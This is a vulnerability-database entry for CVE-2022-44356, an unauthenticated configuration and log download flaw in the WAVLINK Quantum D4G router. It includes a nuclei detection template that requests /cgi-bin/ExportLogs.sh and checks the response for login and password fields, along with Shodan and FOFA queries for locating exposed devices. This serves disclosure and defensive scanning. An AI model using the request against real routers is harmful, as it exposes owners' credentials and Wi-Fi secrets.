WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure

06 Nov 2024 17:42:54 | Reported by ProjectDiscovery | Type: nuclei | github.com

WAVLINK Quantum D4G (WL-WN531G3) has an access control issue that allows unauthenticated attackers to download configuration data and log files, leading to sensitive information disclosure.

Related

Reporter | Title | Published | Family
CNVD | WAVLINK WN531G3 Access Control Error Vulnerability | 30 Nov 2022 00:00 | cnvd
Cvelist | CVE-2022-44356 | 29 Nov 2022 00:00 | cvelist
CVE | CVE-2022-44356 | 29 Nov 2022 17:15 | cve
Prion | Design/Logic Flaw | 29 Nov 2022 17:15 | prion
NVD | CVE-2022-44356 | 29 Nov 2022 17:15 | nvd

id: CVE-2022-44356

info:
  name: WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files.
  impact: |
    Successful exploitation could lead to sensitive information disclosure.
  reference:
    - https://github.com/strik3r0x1/Vulns/blob/main/Wavlink%20WL-WN531G3.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44356
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-44356
    cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:m31g3.v5030.200325:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: wavlink
    product: wl-wn531g3_firmware
    shodan-query: html:"WN531G3"
    fofa-query: body="WN531G3"
  tags: cve,cve2022,wavlink,exposure,wn531g3

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "WN531G3")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
          - 'contains_all(header, "application/octet-stream", "filename=\"")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008e5f7ec61072e84466905a80dfc01ee661835391f14e93242a47a6eb961863e7022055001a053c52d9c3cd335ad3de27e3e61830168ec8824e6da8d718debcf5a11e:922c64590222798bb761d5b6d8e72950

06 Nov 2024 17:54 (Current)
7 High risk
Vulners AI Score: 7
CVSS3: 7.5
EPSS: 0.029